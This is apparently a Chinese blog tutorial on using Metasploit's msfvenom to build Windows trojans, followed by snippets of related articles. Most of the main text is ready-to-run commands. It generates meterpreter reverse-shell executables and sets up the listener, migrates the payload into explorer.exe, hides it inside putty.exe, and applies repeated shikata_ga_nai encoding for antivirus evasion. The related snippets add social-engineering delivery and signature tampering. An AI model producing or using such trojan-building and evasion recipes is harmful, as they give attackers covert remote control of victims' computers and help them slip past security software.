木马与免杀(1), msfvenom 工具, 木马生成, 编码免杀, 在线木马检测

最新推荐文章于 2025-10-09 17:49:30 发布
原创 最新推荐文章于 2025-10-09 17:49:30 发布 · 1.3k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #渗透测试

本文介绍了Msfvenom,Metasploit框架中的工具,用于创建定制恶意软件,如木马、编码Payload和后门。详细讲解了如何生成木马、监听、进程注入、程序捆绑、编码免杀以及查看格式和编码器选项。

Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错[5]。

1. 生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -f exe -o shell.exe

2. 监听木马

在攻击端使用监听模块:
use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

这里看到默认使用的是 generic/shell_reverse_tcp , 我们修改为自己的 windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

查看payload选项:
show options

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

监听的配置需要与木马一致.
这里默认监听的是4444端口, 修改为自己的木马端口:
set lport 5555

lport => 5555

设置木马的 lhost:
set lhost 192.168.112.201

lhost => 192.168.112.201

开启监听:
run

[*] Started reverse TCP handler on 192.168.112.201:5555

到目标主机运行shell.exe木马后, 回到msf等待连接.

5. 进程注入

木马运行后注入到主机的explorer.exe进程中, 即使shell.exe进程结束也不影响木马工作.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 prependmigrateprocess=explorer.exe prpendmigrate=true -f exe -o shell2.exe

6. 程序捆绑

将木马与其他exe程序进行捆绑, 生成一个新的exe程序, 当程序运行的同时也执行木马.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -a x86 --platform windows -x putty.exe -k -f exe -o shell3.exe

7. 编码免杀

使用 shikata_ga_nai 编码进行10次编码.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f exe -o shell4.exe

8. 在线检测木马

https://www.virustotal.com
https://www.virscan.org/language/zh-cn

9. 查看支持的格式

msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    masm
    nim
    nimlang
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript

10. 查看所有编码器

Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder
    x86/xor_poly                  normal     XOR POLY Encoder
msfvenom 生成
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-19 625
1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程。2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为c。生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。shikata_ga_nai 是只支持32位的,所以一定不能用64位编译。
利用msfvenom制作windows木马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
Metasploit 生成木马
2201_75516783的博客
11-28 975
Ox01 简介 在渗透测试的过程中,避不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
一文带你进入黑客的世界:Kali Linux如何使用Metasploit渗透测试工具生成病毒木马
wholeliubei的博客
10-09 997
本文介绍了使用Metasploit框架进行网络安全测试的方法,重点演示了针对Windows系统的"永恒之蓝"漏洞攻击流程。文章首先说明了获取IP地址后通过端口扫描发现漏洞服务的重要性,接着详细讲解了Metasploit的基本功能和使用步骤,包括模块选择、参数配置和攻击执行等关键环节。通过实验展示了如何利用该漏洞获取目标系统权限,并介绍了meterpreter后渗透工具的基本命令。最后强调本文内容仅用于合法安全研究,严禁用于非法用途。
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 652
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2445
使用Metasploit生成木马控制Windows系统
msfvenom——木马
tomyyyyy
08-24 3268
msfvenom——木马篇 目录msfvenom——木马篇c语言执行生成shellcode.cc语言执行检查python语言执行方法一:python加载C代码方法2:py2exe打包编译exe方法3:base64编码c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_t...
木马MSFVenom制作木马
没有网络安全就没有国家安全
03-09 3142
木马MSFVenom制作木马
msfvenom制作360,腾讯木马
小刚的博客
05-19 4278
介绍 msfvenom是用来制作msf所支持的木马文件的,在这介绍一下msfvenom的几个使用参数,和如何制作木马。 主要过程就是使用msfvenom指定特定编码编码次数等生成c语言代码,再使用==VC++==生成程序文件。 msfvenom参数 这里列出几个常用参数,其他参数可使用help查看。 -p 指定所使用的payload -e 指定使用的编码器 -b 删除无效字符 -i 指定编码次数 -f 指定生成的文件类型 -l 列出可使用的项 -o 导出为某文件
msf生成木马
qq_56426046的博客
09-08 6275
1.修改特征码的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒木马所固有的特征,并保证其原有功能没有改变,一次就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到的效果事实上包含着两种方式。一种是改特征码,这也是的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 2056
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
精选资源
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
木马检测工具
05-02
这款软件可以自动检测某个程序包含的木马,并可以选择自动联网检测
木马检测工具
11-27
一款检测木马的软件<br>比较实用!<br>喜欢网络安全或者<br>电脑易受攻击者<br>可以下下来研究研究了<br>
网站木马检测工具
02-21
工具包,集合了本地扫描(不需安装)+网页木马扫描两个木马检测工具,是我在网上找了比较可靠地木马检测工具,ASP木马扫描器和wscan web轻巧版毒。 本人已在我的网站使用过,请放心下载,记得好评! 3分绝得不贵!
AVByPass:一款Web在线自动工具
05-31
一款利用加载器以及Python反序列化绕过AV的在线工具 因为打包方式的局限性,不能跨平台,若要生成exe格式的只能在Windows下运行本项目 打包速度有点慢,提交后稍等一会 开发环境及运行 前端使用框架,后端使用框架 。 在项目根目录下运行pip3 install -r requirements.txt 安装相关依赖 使用 python3 manage.py runserver 0.0.0.0:8000启动程序, 若要使用其他端口作为访问端口,同时需要修改shellcode目录下的shellcode.py文件的13行的端口号。 使用说明 ShellCode 输入如CobaltStrike生成的python版payload.py文件中的buf = "xxxxx" 的 xxxxx 加密次数 通过简单的修改加密次数来绕过360不断网的情况下,效果只有一会的情况 打包方式 目前只支持P
Metasploit——msfvenom木马
迷风小白
07-26 1万+
利用Metasploit中的msfvenom模块生成木马 先来msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等 -p, --paylo...
msfvenom木马生成++壳(实测并不能)
weixin_34342992的博客
02-14 1731
msfvenom 选项: -p, --payload 有效载荷使用。指定一个有效的自定义载荷 --payload-options 列出有效载荷的标准选项 -l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 -n, --nopsled 在一个nopsled [长度]的大小对有效载荷 -f, --format 输出格式(使用-一个列表的帮助格式) --...
Msfvenom编码技术实现实战
weixin_43062666的博客
07-10 3431
技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码工具进行编码,从而实现绕过毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查12,简单但实用...
Msfvenom生成木马并进行处理,使用msfconsole监听的方法
最新发布
10-27
注意到用户提供的四个引用中,引用[2]给出了最基础的木马生成命令模板,引用[3][4]则涉及技术。特别是引用[4]展示的多重编码流程很有参考价值。 在技术实现上,需要强调几个关键细节: - payload选择:...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值